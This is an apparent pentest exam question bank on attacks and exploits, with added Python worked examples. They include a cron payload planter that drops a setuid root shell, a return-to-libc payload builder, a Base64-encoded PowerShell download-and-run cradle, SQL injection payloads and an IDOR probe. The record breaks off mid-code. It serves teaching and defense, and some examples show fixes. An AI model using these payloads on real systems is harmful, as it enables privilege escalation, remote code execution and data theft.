CCNA Attacks And Exploits Questions

75 of 101 questions · Page 1/2 · Attacks And Exploits topic · Answers revealed

1
MCQ · easy

A penetration tester is tasked with exploiting a web application that uses an insecure deserialization vulnerability. Which type of attack should the tester primarily use to execute arbitrary code on the server?

A.Cross-site scripting (XSS)
B.SQL injection
C.Malicious object deserialization
D.Cross-site request forgery (CSRF)
Answer: C

Insecure deserialization allows an attacker to supply crafted objects that execute arbitrary code upon deserialization.

Why this answer

Insecure deserialization vulnerabilities occur when an application reconstructs objects from untrusted data without validating what it is building. The attacker supplies a serialized object graph that, when rebuilt, runs code paths already present in the application's own libraries: a PHP gadget chain built from classes with dangerous __wakeup() or __destruct() methods, a Java chain that abuses the readObject() methods of classes already on the classpath (the attacker cannot ship a custom readObject(); they reuse existing ones), or a Python pickle whose __reduce__ names a callable such as os.system. The code executes during the deserialization step itself, before the application ever inspects the result, which is why option C is the answer.

Exam trap

CompTIA often tests the misconception that insecure deserialization is just another injection flaw like SQLi or XSS. The distinction is that nothing is injected into a query or a page: the application itself faithfully rebuilds the attacker's object and, in doing so, calls code that already exists in its libraries. Validating individual input fields does not help, and no victim user has to click anything.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) exploits client-side script injection in the browser, not server-side code execution via deserialization. Option B is wrong because SQL injection targets database queries through input fields, not the deserialization of serialized objects. Option D is wrong because cross-site request forgery (CSRF) forces a user to perform unintended actions on a web application, not execute arbitrary code on the server through deserialization.
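Worked example (added here; it is not part of the original question set). The Python snippet below shows the same mechanism with the pickle module: a class whose __reduce__ names a callable makes pickle.loads() run that callable the moment it rebuilds the object, and a restricted unpickler with an allow-list of permitted globals refuses it before anything runs. The callable, the allow-list contents and the sample payloads are constructed for the demo; a real gadget would name os.system or subprocess.Popen instead.

```python
import datetime
import io
import pickle
import pickletools

# Constructed side effect: a real gadget would call os.system or subprocess;
# this callable only records that it ran, so the demo is safe to execute.
EXECUTED = []


def attacker_callable(marker):
    EXECUTED.append(marker)
    return marker


class Gadget:
    """Object whose __reduce__ makes pickle call a function when it is loaded.

    pickle stores (callable, args) and the loader runs callable(*args) to
    rebuild the object. That hook, not any parser bug, is the vulnerability.
    """

    def __reduce__(self):
        return (attacker_callable, ("code ran during deserialization",))


def build_malicious_blob() -> bytes:
    return pickle.dumps(Gadget())


def build_benign_blob() -> bytes:
    # A legitimate payload the application genuinely needs to accept.
    return pickle.dumps({"user": "alice", "since": datetime.date(2024, 1, 1)})


def vulnerable_load(blob: bytes):
    # Deserialises untrusted bytes directly: any callable in the stream runs.
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler. find_class is consulted for every global the
    stream wants to import; anything outside the list is refused before it
    can be called. Built-in containers (dict, list, str, ...) never go
    through find_class, so they need no entry."""

    ALLOWED = {("datetime", "date")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def try_safe_load(blob: bytes):
    """Returns ('ok', obj) or ('blocked', reason) without raising."""
    try:
        return ("ok", safe_load(blob))
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))


def list_globals(blob: bytes):
    """Static triage: which module.name globals would the stream import on
    load? Lets you inspect a suspicious blob without executing it."""
    names, strings = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "GLOBAL":            # protocol <= 3: "module name"
            names.append(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL":      # protocol >= 4: two strings on the stack
            names.append(f"{strings[-2]}.{strings[-1]}")
    return names


if __name__ == "__main__":
    blob = build_malicious_blob()
    print("globals referenced:", list_globals(blob))
    print("pickle.loads ->", vulnerable_load(blob), "| side effect:", EXECUTED)
    print("restricted   ->", try_safe_load(blob))
    print("benign       ->", try_safe_load(build_benign_blob()))
```

Run it once to see the callable fire under pickle.loads() and be refused by the allow-list; list_globals() is the check to run on a captured blob before anyone is tempted to load it.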

2
MCQ · hard

A penetration tester has gained a low-privileged shell on a Linux server. During enumeration, the tester finds a cron job that runs a script as root every five minutes. The script is located in /opt/backup.sh and is world-writable. Which technique should the tester use to escalate privileges?

A.Kernel exploit
B.SUID binary exploitation
C.Cron job script manipulation
D.Password cracking
Answer: C

Since the script is world-writable and run as root, the tester can insert a reverse shell or other commands to gain root access when the cron job fires.

Why this answer

Option C is correct because the cron job runs as root and the script /opt/backup.sh is world-writable, meaning any user can modify it. By injecting a reverse shell or privilege escalation command into the script, the tester can execute arbitrary code with root privileges when the cron job triggers. This is a classic cron job script manipulation attack, leveraging the scheduled task's root execution context.

Exam trap

The trap here is that candidates may overthink and choose a kernel exploit or SUID attack, overlooking the simpler and more direct vector of modifying a world-writable script executed by a privileged cron job.

How to eliminate wrong answers

Option A is wrong because kernel exploits target vulnerabilities in the Linux kernel to gain root, but the scenario already provides a direct path via a writable cron script; a kernel exploit is unnecessary and risks crashing the system. Option B is wrong because SUID binary exploitation requires a setuid-root binary that can be abused to run commands as root, and none is mentioned; the flaw here is the writable script, not a misconfigured SUID file. Option D is wrong because password cracking needs hashes the tester does not yet have (a low-privileged shell cannot read /etc/shadow), and even with them success is slow and uncertain, whereas the cron job guarantees root execution within five minutes.
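Worked example (added here; not from the original page). This Python script performs the enumeration step the question assumes and the modification step it describes: it parses system-crontab lines, flags files referenced by root jobs that other users may write, and appends a payload. The crontab content, file names and payload are constructed inside a temporary directory, so it runs without touching a real /etc/crontab; on a target you would feed it the contents of /etc/crontab and /etc/cron.d/*.

```python
import os
import stat
import tempfile
from pathlib import Path

# Constructed payload for the demo; the classic real-world choice is to drop a
# setuid copy of a shell that the tester can then run as root.
PAYLOAD = "cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash"


def is_world_writable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def parse_system_crontab(text: str):
    """Yield (user, command) from /etc/crontab or /etc/cron.d/* content.

    System crontabs carry a user field: minute hour dom month dow user command.
    Per-user crontabs (crontab -l) have no user field and run as that user.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                  # comments and VAR=value lines
        if line.startswith("@"):                      # @reboot / @daily user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]


def find_writable_root_scripts(crontab_text: str):
    """Return every existing file referenced by a root job that others may write."""
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        # "/bin/sh /opt/backup.sh" names the script as an argument, so check
        # every absolute path token, not just the first word.
        for token in command.split():
            if token.startswith("/") and os.path.isfile(token) and is_world_writable(token):
                if token not in hits:
                    hits.append(token)
    return hits


def plant_payload(script_path: str, payload: str = PAYLOAD) -> None:
    """What the tester does once a hit is confirmed: append a line the root job
    will execute on its next run. Appending keeps the original behaviour so the
    job does not start failing and drawing attention."""
    with open(script_path, "a", encoding="utf-8") as fh:
        fh.write("\n" + payload + "\n")


def build_demo_environment() -> dict:
    """Constructed fixture standing in for the real filesystem: a temp directory
    with one correctly permissioned script, one world-writable script, and a
    system crontab that references both."""
    root = Path(tempfile.mkdtemp(prefix="cron-demo-"))
    rotate = root / "rotate_logs.sh"
    rotate.write_text("#!/bin/sh\nlogrotate /etc/logrotate.conf\n")
    rotate.chmod(0o755)
    backup = root / "backup.sh"
    backup.write_text("#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n")
    backup.chmod(0o666)                               # the misconfiguration
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/5 * * * *  root     {backup}\n"
        f"0 3 * * *    root     /bin/sh {rotate}\n"
        f"*/5 * * * *  www-data {backup}\n"            # writable, but not a root job
        f"@reboot      root     {root}/missing.sh\n"   # referenced but absent
    )
    return {"crontab": crontab, "writable": str(backup), "safe": str(rotate)}


if __name__ == "__main__":
    env = build_demo_environment()
    hits = find_writable_root_scripts(env["crontab"])
    print("world-writable scripts run by root:", hits)
    for path in hits:
        plant_payload(path)
        print(f"appended payload to {path}; root runs it on the next cron tick")
```

The same check with the mode bits of the script's parent directory (a writable directory lets the tester replace the file even when the file itself is 755) is the next thing to add on a real engagement.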

3
MCQ · hard

A penetration tester is attempting to exploit a buffer overflow vulnerability in a Linux binary. The binary has Data Execution Prevention (DEP) enabled but Address Space Layout Randomization (ASLR) is disabled. Which exploitation technique would be the MOST effective to achieve code execution?

A.Inject shellcode into the buffer and redirect execution to it
B.Use a ROP chain to call mprotect() to make the stack executable, then jump to shellcode
C.Perform a return-to-libc attack to call system("/bin/sh")
D.Use a heap spray to place shellcode at a known address and then trigger the overflow
Answer: C

Correct. Return-to-libc bypasses DEP by reusing existing executable code in libc. Without ASLR, addresses are predictable, making this straightforward.

Why this answer

With DEP enabled, the stack is non-executable, so injecting shellcode into the buffer (Option A) would fail. Since ASLR is disabled, libc is loaded at the same address on every run, so the tester can take its function addresses once from a debugger and rely on them. Option C exploits this by overwriting the saved return address with the address of system() and supplying, as its argument, the address of a "/bin/sh" string that already exists inside libc (optionally followed by the address of exit() so the process ends cleanly). No byte that the attacker wrote is ever executed, so DEP has nothing to block.

Exam trap

The trap here is that candidates assume DEP alone forces a full ROP chain, but with ASLR disabled the fixed libc addresses make plain return-to-libc sufficient. One practical caveat: on 32-bit x86 the argument is simply placed on the stack, whereas on x86-64 the first argument travels in RDI, so even return-to-libc needs a single pop rdi; ret gadget. That is still far simpler than a chain that calls mprotect() and then pivots to shellcode.

How to eliminate wrong answers

Option A is wrong because DEP marks the stack non-executable, so jumping into injected shellcode faults immediately. Option B is wrong because a ROP chain that calls mprotect() to make the stack executable and then jumps to shellcode does work, but it is strictly more complex than needed when ASLR is off; return-to-libc reaches code execution with fewer gadgets and fewer fixed addresses to get right. Option D is wrong because heap spraying is a technique for making a guessed address likely to hold the payload when exact placement is unknown, mainly in browser exploits; here nothing is unknown, the scenario gives no heap allocation primitive, and a perfectly placed shellcode buffer on the heap would still be non-executable under DEP.
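Worked example (added here; not from the original page). The builder below lays out the return-to-libc payload for both architectures, using constructed libc addresses and hypothetical padding offsets (76 and 72 bytes) that stand in for values you would read with gdb on the real binary. It is not a complete exploit: the point is the word order the CPU consumes, why x86-64 needs a pop rdi; ret gadget, and the NUL-byte problem that 64-bit addresses create for strcpy-style overflows.

```python
import struct

# Constructed addresses for a hypothetical 32-bit glibc with ASLR disabled; on a
# real target read them in gdb ("p system", "p exit", then search for "/bin/sh").
LIBC32 = {"system": 0xF7E0C2A0, "exit": 0xF7DFE9D0, "binsh": 0xF7F4F0AF}
# Constructed addresses for a hypothetical x86-64 target with a fixed libc mapping.
LIBC64 = {"system": 0x7FFFF7E15E10, "binsh": 0x7FFFF7F5A698,
          "pop_rdi_ret": 0x7FFFF7E0A5F5, "ret": 0x7FFFF7E0A5F6}


def ret2libc_x86(offset: int, libc: dict) -> bytes:
    """32-bit cdecl layout. After the corrupted saved EIP, the CPU treats the
    next dword as system()'s return address (exit() keeps the crash quiet) and
    the one after that as system()'s first argument."""
    return b"A" * offset + struct.pack("<III", libc["system"], libc["exit"], libc["binsh"])


def ret2libc_x86_64(offset: int, libc: dict) -> bytes:
    """x86-64 SysV layout. The first argument travels in RDI, so even plain
    return-to-libc needs one 'pop rdi; ret' gadget. The extra lone 'ret'
    restores the 16-byte stack alignment that system() relies on."""
    return b"A" * offset + struct.pack(
        "<QQQQ", libc["pop_rdi_ret"], libc["binsh"], libc["ret"], libc["system"])


def control_words(payload: bytes, offset: int, width: int):
    """Decode the words after the padding in the order the CPU will pop them."""
    fmt = "<I" if width == 4 else "<Q"
    tail = payload[offset:]
    return [struct.unpack(fmt, tail[i:i + width])[0] for i in range(0, len(tail), width)]


def nul_positions(payload: bytes, offset: int):
    """Offsets of NUL bytes inside the control words. A strcpy/gets-style
    overflow stops copying at the first NUL, so bytes after it never land.
    Canonical x86-64 user addresses always carry two high NUL bytes, which is
    why a strcpy overflow on x86-64 can deliver at most one address (the copy's
    own terminator supplies its NULs) and longer chains need a length-based
    copy such as read() or memcpy()."""
    return [i for i, b in enumerate(payload) if i >= offset and b == 0]


if __name__ == "__main__":
    p32 = ret2libc_x86(76, LIBC32)
    p64 = ret2libc_x86_64(72, LIBC64)
    print("x86 words:", [hex(w) for w in control_words(p32, 76, 4)], "NULs:", nul_positions(p32, 76))
    print("x64 words:", [hex(w) for w in control_words(p64, 72, 8)], "NULs:", nul_positions(p64, 72))
```

Feed the resulting bytes to the vulnerable program's input (for example through a pipe into its stdin, with the listener side of a shell kept open), substituting the offset and addresses measured on the real binary.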

4
Matching · medium

Match each reporting element to its description.


High-level overview for non-technical management

Detailed steps and tools used during testing

List of vulnerabilities with severity ratings

Recommended actions to fix vulnerabilities

Raw logs, scripts, and supporting evidence

Why these pairings

A penetration-testing report typically contains these five sections: an executive summary giving management a high-level, non-technical overview; a methodology section with the detailed steps and tools used; a findings section listing each vulnerability with a severity rating; a remediation section with recommended fixes; and appendices holding raw logs, scripts and other supporting evidence.

5
MCQ · easy

A penetration tester has gained administrative access to a Windows system and wants to extract NTLM password hashes from the memory of the Local Security Authority Subsystem Service (LSASS). Which tool is most commonly used for this purpose?

A.John the Ripper
B.Mimikatz
C.Hashcat
D.Netcat
Answer: B

Mimikatz is specifically designed to extract credentials from LSASS memory on Windows systems.

Why this answer

Mimikatz is the most commonly used tool for extracting NTLM password hashes from LSASS memory on a Windows system. Its `sekurlsa::logonpasswords` module reads the LSASS process memory and decrypts the cached logon material (NT hashes and, on older or misconfigured hosts, WDigest plaintext passwords) using the LSA keys that are also resident in memory, so no brute-force or dictionary attack is needed. Reading LSASS requires SeDebugPrivilege (`privilege::debug`) or a SYSTEM token, which is why administrative access is a prerequisite; on hosts with Credential Guard or LSASS running as a protected process (RunAsPPL), the read fails without additional work.

Exam trap

The trap here is that candidates confuse hash extraction tools (Mimikatz) with hash cracking tools (John the Ripper, Hashcat), assuming any tool that works with hashes can also extract them from memory.

How to eliminate wrong answers

Option A is wrong because John the Ripper is a password cracking tool that operates on already-extracted hash files (e.g., NTLM hashes saved to a file), not a tool for extracting hashes from LSASS memory. Option C is wrong because Hashcat is a GPU-accelerated password recovery tool that cracks hashes from a provided hash list, but it cannot access or extract hashes from a running Windows process like LSASS. Option D is wrong because Netcat is a raw TCP/UDP utility for connections, file transfers and shells; it has no capability to read process memory.

6
MCQ · medium

A penetration tester has compromised a host and wants to move laterally to a server using pass-the-hash. Which of the following is required for a successful pass-the-hash attack against a Windows target?

A.The target must have SMB signing enabled
B.The target must have the same local admin password hash
C.The target must have a user account with the same password
D.The target must have the same machine account hash
Answer: B

If the local admin account on the target has the same hash, the attacker can authenticate using that hash.

Why this answer

Pass-the-hash (PtH) attacks exploit the NTLM challenge-response mechanism, in which the NT hash, not the plaintext password, is the secret used to compute the response. If the local administrator account on the target uses the same password as on the compromised host, the two accounts share the same NT hash, so the captured hash authenticates to the target without the password ever being known. Tools such as Mimikatz extract the hash from LSASS on the first host, and the same tool (or impacket's psexec/wmiexec with -hashes) replays it against the second. Shared local administrator passwords across a fleet are exactly why this works, and why solutions such as LAPS randomise them per host.

Exam trap

Cisco often tests the misconception that pass-the-hash requires the plaintext password, or that SMB signing has anything to do with it. In fact the hash alone suffices, and SMB signing does not stop pass-the-hash: the attacker holds the real secret and can sign like any legitimate client. SMB signing defeats NTLM relay, a different attack in which the attacker lacks the hash.

How to eliminate wrong answers

Option A is wrong because SMB signing protects message integrity and defeats NTLM relay, not pass-the-hash: an attacker who holds the NT hash can derive the session key and sign traffic exactly as the legitimate client would. Option C is wrong because pass-the-hash never needs the plaintext password; the hash is the password-equivalent secret used in the NTLM exchange (if the account happened to share a password, it would share a hash too, but the tester does not need to know it). Option D is wrong because the machine account hash belongs to a different principal (the computer object) and is not what the tester replays; a matching machine account hash would not grant access as the administrator. One practical caveat: for local accounts other than the built-in Administrator (RID 500), remote UAC token filtering blocks administrative network logons unless LocalAccountTokenFilterPolicy is set to 1.

7
Drag &amp; Drop · medium

Drag and drop the steps to perform a web application fuzzing using Burp Suite Intruder into the correct order.


Why this order

Intruder fuzzing follows one workflow: capture the target request through the Burp proxy, send it to Intruder, clear the default insertion points and mark the parameter to fuzz, choose an attack type (Sniper for a single position) and load a payload list, start the attack, then sort the results by status code, response length and error strings to spot anomalous responses.

8
MCQ · easy

While performing a password audit, a tester finds that the hash of 'Password123' is stored in the LAN Manager (LM) hash format. What is the primary security weakness of LM hashes?

A.The password is split into two 7-character halves
B.The hash is case-sensitive
C.The hash is salted with a weak random value
D.The hash uses the MD4 hashing algorithm
Answer: A

This reduces keyspace to two 7-character halves, easily brute-forced.

Why this answer

The primary weakness of LAN Manager (LM) hashes is the way the password is processed: it is converted to uppercase, padded with NULs or truncated to exactly 14 bytes, and split into two 7-byte halves. Each half is expanded into a 56-bit DES key and used to encrypt the fixed string KGS!@#$%; the two 8-byte ciphertexts are concatenated to form the 16-byte LM hash. Because the halves are computed independently, an attacker cracks each one separately: the search space falls from roughly 69^14 to two searches of 69^7 (an uppercase alphabet plus digits and symbols), and any password of seven characters or fewer has a second half equal to the constant value AAD3B435B51404EE. Modern tools such as John the Ripper or Hashcat, or precomputed rainbow tables, recover LM hashes in minutes.

Exam trap

The trap here is that candidates often confuse LM hashes with NTLM hashes, incorrectly associating the weakness with MD4 (which is used by NTLM) or salting, when the real vulnerability is the split into two 7-character halves that can be attacked independently.

How to eliminate wrong answers

Option B is wrong because LM hashes are case-insensitive: the password is uppercased before hashing, so case adds no entropy at all (a weakness, but not the one being asked about). Option C is wrong because LM hashes are not salted; the constant KGS!@#$% is the plaintext that each password half encrypts, not a salt, and with no per-user randomness identical passwords produce identical hashes, which is what makes rainbow tables so effective. Option D is wrong because LM uses DES, not MD4; MD4 over the UTF-16LE password is the NT hash (often loosely called the NTLM hash), which removed the uppercasing and the 7-character split but is still unsalted and fast to crack.

9
MCQ · medium

A penetration tester has gained a shell on a Linux machine as a low-privileged user. The user can execute the binary 'less' with sudo privileges without a password. Which technique can the tester use to escalate privileges to root?

A.Exploit a buffer overflow in the 'less' binary.
B.Use the '!' command within 'less' to execute a shell.
C.Run 'sudo -u root bash' to switch to a root shell.
D.Modify the PATH to trick sudo into running a malicious binary.
Answ﻿er: B

Correct. The '!' command in less allows execution of shell commands. With sudo, this runs as root, granting privilege escalation.

Why this answer

The 'less' binary, when executed with sudo, retains its ability to spawn a shell via the '!' command. Since the user can run 'less' as root without a password, typing '!/bin/bash' (or simply '!bash') inside 'less' will execute a shell with root privileges, effectively escalating to root.

Exam trap

The trap here is that candidates may overlook the shell escape feature of pagers like 'less' and instead assume they need to exploit a binary vulnerability or use a generic 'sudo -u root bash' command, which fails because the sudoers rule is specific to 'less' only.

How to eliminate wrong answers

Option A is wrong because exploiting a buffer overflow in 'less' is unnecessary and impractical; the intended privilege escalation vector is the built-in '!' command, not a memory corruption vulnerability. Option C is wrong because 'sudo -u root bash' requires the user to have explicit sudo permissions for 'bash', which they do not; the sudoers entry only grants passwordless execution of 'less', not arbitrary commands. Option D is wrong because the sudoers rule names 'less' by its absolute path and sudo resets PATH to its secure_path by default, so there is no PATH lookup to hijack.

10
MCQ · hard

A penetration tester discovers a remote command injection vulnerability in a Java-based web application on a Windows server. The tester wants to execute a PowerShell reverse shell. Which encoding technique is most effective to avoid filter restrictions on special characters?

A.Base64 encoding
B.URL encoding
C.Unicode encoding
D.Hex encoding
Answer: A

PowerShell supports -EncodedCommand, allowing the entire command to be Base64-encoded, which evades many filter restrictions on special characters.

Why this answer

Base64 encoding is the most effective technique because the entire PowerShell command, including semicolons, pipes, quotes and dollar signs, becomes a string drawn only from A-Z, a-z, 0-9, +, / and =, which passes most special-character filters. PowerShell natively supports the `-EncodedCommand` parameter (abbreviated `-enc`), which takes the Base64 of the UTF-16LE bytes of the script and executes it directly, so the injected command needs no decoding logic of its own. Two caveats a tester should check: some filters also reject +, / or =, and `-EncodedCommand` is one of the most heavily logged and alerted PowerShell indicators, so passing an input filter is not the same as evading endpoint detection.

Exam trap

The trap here is that candidates often choose URL encoding because it is familiar from web attacks, but they overlook that PowerShell's `-EncodedCommand` parameter is specifically designed for Base64, making it the most direct and filter-evading method for remote command injection on Windows.

How to eliminate wrong answers

Option B (URL encoding) is wrong because the web server decodes percent-escapes before the application sees the parameter, so a filter in the application still sees the semicolon or pipe; URL encoding changes nothing at the command-injection layer. Option C (Unicode encoding) is wrong because there is no PowerShell switch that consumes \u- or %u-escaped text; `-EncodedCommand` expects Base64 of the UTF-16LE bytes of the script, which is a specific encoding, not "Unicode encoding" in the filter-evasion sense. Option D (Hex encoding) is wrong because PowerShell has no built-in parameter that accepts a hex-encoded command; the tester would have to include decoding logic in the injected command itself, which reintroduces the very characters being filtered.
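Worked example (added here; not from the original page). The helper below produces the exact argument `-EncodedCommand` expects, shows the common UTF-8 mistake, and checks the result against a constructed character filter. The command text, the host in it and the set of filtered characters are placeholders chosen for the demo.

```python
import base64

# Constructed filter: the characters the vulnerable parameter rejects.
BLOCKED = set(";|&'\"$<>`")

# Constructed download-cradle style command; host and path are placeholders.
COMMAND = ("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/s.ps1'); "
           "Write-Output \"done\"")


def encode_powershell(command: str) -> str:
    """Exactly what -EncodedCommand expects: Base64 of the UTF-16LE bytes."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def utf8_base64(command: str) -> str:
    """The common mistake: Base64 of UTF-8. powershell.exe decodes the bytes
    as UTF-16LE and runs garbage, or nothing at all."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def decode_like_powershell(encoded: str):
    """Simulate how powershell.exe interprets the argument. Returns None when
    the bytes are not valid UTF-16LE (an odd byte count, for example)."""
    try:
        return base64.b64decode(encoded).decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def passes_filter(text: str, blocked=BLOCKED) -> bool:
    return not (set(text) & blocked)


def build_injection(command: str) -> str:
    """The token dropped into the injection point. -enc is an accepted alias."""
    return f"powershell.exe -NoProfile -NonInteractive -EncodedCommand {encode_powershell(command)}"


def base64_alphabet_risk(encoded: str) -> set:
    """Base64 still emits '+', '/' and '='; a filter that also blocks those
    needs another route, such as padding the command so the encoding avoids them."""
    return set(encoded) & set("+/=")


if __name__ == "__main__":
    print("raw passes filter:    ", passes_filter(COMMAND))
    print("encoded passes filter:", passes_filter(build_injection(COMMAND)))
    print(build_injection(COMMAND))
    print("utf-8 mistake decodes to:", decode_like_powershell(utf8_base64(COMMAND)))
```

Generate the argument on the attacking machine with this helper rather than with `base64 -w0` on the raw text, which is the UTF-8 trap the second function demonstrates.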

11
MCQ · hard

A penetration tester discovers a web application that uses client-side JavaScript to validate user input before form submission. The input is then sent to the server and used directly in a SQL query without server-side validation. Which attack would most effectively exploit this vulnerability?

A.SQL injection
B.Cross-site scripting (XSS)
C.Command injection
D.Parameter pollution
Answer: A

Client-side validation is easily bypassed; by sending malicious SQL payloads directly to the server, the tester can manipulate the database query.

Why this answer

The correct answer is A because the vulnerability described—client-side JavaScript validation with no server-side sanitization, followed by direct use of input in a SQL query—is the classic precondition for SQL injection. An attacker can bypass client-side controls (e.g., by disabling JavaScript or using a proxy like Burp Suite) and submit crafted SQL syntax (e.g., `' OR 1=1 --`) to manipulate the query, extract data, or execute arbitrary SQL commands on the database server.

Exam trap

The trap here is that candidates may confuse client-side validation bypass with XSS, thinking that JavaScript injection is the primary risk, but the key is that the input flows directly into a SQL query, making SQL injection the most effective and direct attack.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) exploits the injection of client-side scripts into web pages viewed by other users, not the manipulation of SQL queries on the server; the described scenario involves direct server-side SQL execution, not reflected or stored output in a browser. Option C is wrong because command injection targets operating system commands via shell execution (e.g., through `exec()` or `system()` calls), not SQL queries; the input is used in a SQL query, not a system command. Option D is wrong because parameter pollution involves manipulating HTTP parameters (e.g., duplicate `id` parameters) to override or confuse server-side logic, but it does not directly exploit SQL query construction from unsanitized input.
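Worked example (added here; not from the original page). The SQLite snippet below reproduces the scenario end to end: a mirror of the client-side validation rule, the server handler that concatenates input into the query, the parameterized fix, and the two payloads a tester would send straight to the server with a proxy or curl. The table and its rows are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def client_side_validate(value: str) -> bool:
    """Mirror of the browser-side JavaScript rule: letters and digits only.
    Because it runs in the browser, a request sent from a proxy or curl
    simply never passes through it."""
    return value.isalnum()


def lookup_vulnerable(conn, username: str):
    """Server code the question describes: input concatenated into the query."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username: str):
    """Fix: a bound parameter is data, never SQL, whatever the browser did."""
    return conn.execute("SELECT username, email FROM users WHERE username = ?",
                        (username,)).fetchall()


def run_attack(conn, payload: str) -> dict:
    """Send the same payload to both handlers, bypassing the JavaScript check."""
    return {
        "client_validation_would_pass": client_side_validate(payload),
        "vulnerable_rows": lookup_vulnerable(conn, payload),
        "safe_rows": lookup_safe(conn, payload),
    }


TAUTOLOGY = "' OR 1=1 --"                                        # returns every row
SCHEMA_DUMP = "' UNION SELECT name, sql FROM sqlite_master --"   # reads table definitions


if __name__ == "__main__":
    db = make_db()
    for payload in (TAUTOLOGY, SCHEMA_DUMP):
        print(payload, "->", run_attack(db, payload))
```

The parameterized query returns nothing for both payloads because the whole string is compared against username as a literal; server-side validation is still worth adding, but it is the binding, not the validation, that removes the injection.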

12
MCQ · easy

A penetration tester has compromised a Linux server and gained a low-privilege shell. The tester discovers that the /etc/shadow file is readable by the tester's user. Which attack is most directly enabled by this finding?

A.Pass-the-hash
B.Password cracking offline
C.LLMNR poisoning
D.Kerberoasting
Answer: B

Reading /etc/shadow directly enables offline password cracking because the hashes can be extracted and attacked with tools like John the Ripper or Hashcat.

Why this answer

The /etc/shadow file contains the hashed passwords for all users on the system. If a low-privilege user can read this file, they can copy the password hashes and attempt to crack them offline using tools like John the Ripper or Hashcat. This directly enables an offline password cracking attack, as the tester can brute-force or use dictionary attacks against the hashes without needing to interact with the live system.

Exam trap

The trap here is that candidates may confuse the ability to read a password hash file with a pass-the-hash attack, but pass-the-hash is a Windows-specific technique that requires NTLM hashes and a network authentication context, not a local file read on Linux.

How to eliminate wrong answers

Option A is wrong because pass-the-hash is an attack that uses captured NTLM hashes to authenticate to Windows systems, not Linux systems; it requires a Windows environment and does not apply to reading /etc/shadow. Option C is wrong because LLMNR poisoning is a Windows-specific network attack that exploits the Link-Local Multicast Name Resolution protocol to capture NetNTLMv2 hashes, and it is not related to reading a local file on a Linux server. Option D is wrong because Kerberoasting targets Kerberos service tickets in Active Directory environments to crack service account passwords; it is a Windows domain attack and does not involve the /etc/shadow file on a Linux server.

13
MCQ · medium

During a web application test, a penetration tester discovers that the application exposes internal object references (e.g., user ID in a URL) and does not properly authorize access. The tester can view other users' private data by simply changing the ID parameter. Which type of vulnerability does this represent?

A.Cross-Site Request Forgery (CSRF)
B.Insecure Direct Object Reference (IDOR)
C.SQL Injection
D.Cross-Site Scripting (XSS)
Answer: B

Correct. The scenario describes exactly this: direct manipulation of an object reference (user ID) to access other users' data without proper authorization.

Why this answer

The vulnerability is Insecure Direct Object Reference (IDOR) because the application exposes internal object references (e.g., a user ID in the URL) and fails to enforce authorization on them. By changing the ID parameter while authenticated as one user, the tester reads another user's private data: the server trusts the reference in the request and never checks that the referenced record belongs to the session identity. That missing ownership check, not a missing login, is the hallmark of IDOR (also called broken object-level authorization).

Exam trap

CompTIA often tests IDOR by presenting a scenario where a parameter is manipulated to access another user's data, and the trap is confusing it with CSRF (which involves state-changing actions via forged requests) or SQL injection (which involves database query manipulation), rather than recognizing the core issue as missing authorization on direct object references.

How to eliminate wrong answers

Option A is wrong because Cross-Site Request Forgery (CSRF) involves tricking a user into executing unwanted actions on a web application where they are authenticated, not directly manipulating object references to access unauthorized data. Option C is wrong because SQL Injection is a code injection technique that exploits insecure database queries by inserting malicious SQL statements, not by manipulating exposed object references in URLs or parameters.
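Worked example (added here; not from the original page). The handlers below show the vulnerable and fixed versions of the lookup, plus a probe loop that does what the tester did: stay authenticated as one user and walk the neighbouring ids. The profile store, the ids and the field names are constructed.

```python
from dataclasses import dataclass


@dataclass
class Profile:
    owner: str
    email: str
    ssn_last4: str


class Forbidden(Exception):
    pass


# Constructed store; the integer key is the "internal object reference" that
# appears in URLs such as /api/profile?id=1002.
PROFILES = {
    1001: Profile("alice", "alice@example.test", "1234"),
    1002: Profile("bob", "bob@example.test", "9876"),
    1004: Profile("carol", "carol@example.test", "5555"),
}


def get_profile_vulnerable(session_user: str, profile_id: int) -> Profile:
    """Authentication only. Any logged-in user can fetch any id."""
    if session_user is None:
        raise PermissionError("login required")
    return PROFILES[profile_id]


def get_profile_fixed(session_user: str, profile_id: int) -> Profile:
    """Authorization added: the record must belong to the session identity.
    Missing and foreign ids get the same error so the endpoint does not
    double as an id-enumeration oracle."""
    if session_user is None:
        raise PermissionError("login required")
    profile = PROFILES.get(profile_id)
    if profile is None or profile.owner != session_user:
        raise Forbidden(f"profile {profile_id} not accessible")
    return profile


def idor_probe(session_user: str, id_range, fetch):
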